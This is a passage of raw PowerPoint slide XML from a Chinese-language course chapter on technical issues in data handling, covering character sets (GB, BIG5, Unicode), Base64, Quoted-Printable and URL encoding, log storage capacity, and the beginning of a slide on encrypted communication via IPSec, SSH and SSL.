              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节。该字符集与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码兼容，目前简体中文都使用该字符集。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BIG5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>繁体中文字符集，每个文字占用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节。该字符集与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码兼容，与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码不兼容，目前繁体中文都使用该字符集。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UNICODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符集是国际标准，包含全世界各种语言的字符，每个文字占用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节。英文字符是在原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码的基础上高位补零，中文字符则与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BIG5码不兼容。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档以及注册表内保存的中文都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UNICODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="979300"/>
            <a:ext cx="7200800" cy="3416320"/>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zh-CN" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是根据一定的算法将数据转换成需要的格式。常见的数据编码有以下几种：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BASE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：一种编码方式，将每</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节的数据编码成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节的数据。方法是将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>位数据分成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>部分，每部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>位，这</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>位数据根据码表对应一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符，形成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节的字符。经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BASE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码，任何数据都转换成可显示的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符。主要用于电子邮件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Quoted Printable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：一种编码方式，英文编码后不变，汉字（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节）编码后变成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节。编码方式是每个字节转换成“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”号加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进制内码的形式，共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节。主要用于电子邮件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的参数只能传递可显示的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符，如果要传递空格或者汉字，则需要进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码。编码方式是每个字节转换成“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”号加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进制内码的形式，共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节。</a:t>
            </a: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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1115616" y="1036499"/>
            <a:ext cx="6408712" cy="1754326"/>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zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>四、数据存储容量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当有大量网络活动，特别是紧急安全事件例如攻击发生时，在一个极短的时间内日志会记录大量的事件。如果没有足够的存储空间，最近网络活动的信息会被覆盖或者丢失。因此，应该估算日志使用的典型值和峰值，决定应该保留数据多少小时或多少天，以确保系统和应用程序有足够的存储容量。</a:t>
            </a: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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="915566"/>
            <a:ext cx="7200800" cy="3370153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>五、加密数据通信</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
